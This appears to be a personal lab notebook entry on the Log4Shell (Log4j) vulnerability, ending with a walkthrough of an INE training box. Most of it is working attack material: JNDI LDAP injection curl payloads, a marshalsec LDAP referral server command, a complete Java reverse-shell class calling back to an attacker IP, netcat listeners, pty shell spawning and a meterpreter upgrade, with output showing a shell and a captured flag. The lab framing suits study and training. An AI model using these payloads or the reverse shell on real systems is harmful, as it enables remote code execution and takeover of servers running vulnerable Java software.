Log4j Vulnerability (Log4Shell)
Vul reported on 9/Dec/2021 on Apache Java Logging Lib: Log4J
Background:
1-A quick 3 min video to get what all the fuss is about from Marcus Hutchins:
GOVCERT:
More practical Demonstration from Sophos:
Tut Notes:
Check if the server is vul:
1- start a server/listener:
nc -nlvp 12342- send a request to the potential vul point:
curl "<url>?cmd=$\{jndi:ldap://<attacker_IP>:1234\}"if you received a conn (respond) in nc then it's vul.
Exploiting the vul in your own LDAP server:
we will be using the following script to automate: https://github.com/kozmer/log4j-shell-poc
1- Setup the a LDAP server so we can interpret the response:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<attacker_IP>:8080/#Exploit"#Exploit: is the name of the exploit we will creat.
inside the poc.py there's the java code (in comment) copy it to a new
Exploit.javafile cuz this is the exploit. and fill in yourString host="<attackerIP>";int port = <nc_port>;
2-compiling the exploit:
javac Exploit.java -source 8 -target 8-source: Java version
-target: JDK version
1 warning don't worry about it
3- Setup the server to host the Exploit:
python -m SimpleHTTPServer 80808080 cuz that's the port we setup our ldap on.
4-Setup a listener to receive the conn from the target once it's exploited:
nc -nlvp 9999same port as the one in the Exploit.java
5-attack (sending the req):
curl '<target_url>?cmd=$\{jndi:ldap://<attacker_ip>:<ldap_port>/Exploit\}'<ldap_port>: from step 1
no reason to provide the extension ldap knows it by itself.
🎉Now in nc you received a conn. and now you have a reverse shell.🎉
you can spawn a bash shell:
python -c 'import pty;pty.spawn("/bin/bash")'and of course, you can upgrade to a meterpreter shell:
use multi/handler
set LHOST <attacker_ip>
set LPORT <port in java code>
run
background
session -u 1 <-this uses shell2meterpreter moduleSolving INE Box:
target: demo.ine.local
My IP: 192.10.137.2
Footprinting:
~# nmap -sV demo.ine.local
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-08 15:37 IST
Nmap scan report for demo.ine.local (192.10.137.3)
Host is up (0.0000090s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache Tomcat 8.5.3
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)runs Apache Tomcat while by default it doesn't really depend on Log4j but it can be config:
Apache Jserv interesting but not tatrget here I know this ver is vul.
Checking for the vul:
nc -nlvp 1234curl 'http://demo.ine.local/login?cmd=$\{jndi:ldap:192.10.137.2:1234\}'we got a respone in nc it's vul...😀
Time to exploit it:
my LDAP:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.10.137.2:8080/#Exploit"
Listening on 0.0.0.0:1389nc lisnter:
nc -nlvp 9999Compiling the Java Exploit (RevShell):
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="192.10.137.2";
int port=9999;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port)
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){}
};
p.destroy();
s.close();
}
}javac Exploit.java -source 8 -target 8server Hosting the Exploit:
python -m SimpleHTTPServer 8080exploit:
curl 'http://demo.ine.local/login?cmd=$\{jndi:ldap://192.10.137.2:1389/Exploit\}'Goal achived:
root@INE:~# nc -nlvp 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.10.137.3.
Ncat: Connection from 192.10.137.3:46500.
ls
FLAG
tomcat8
cat FLAG
33fbfa01ec2f791096f13e01988a164eLast updated
Was this helpful?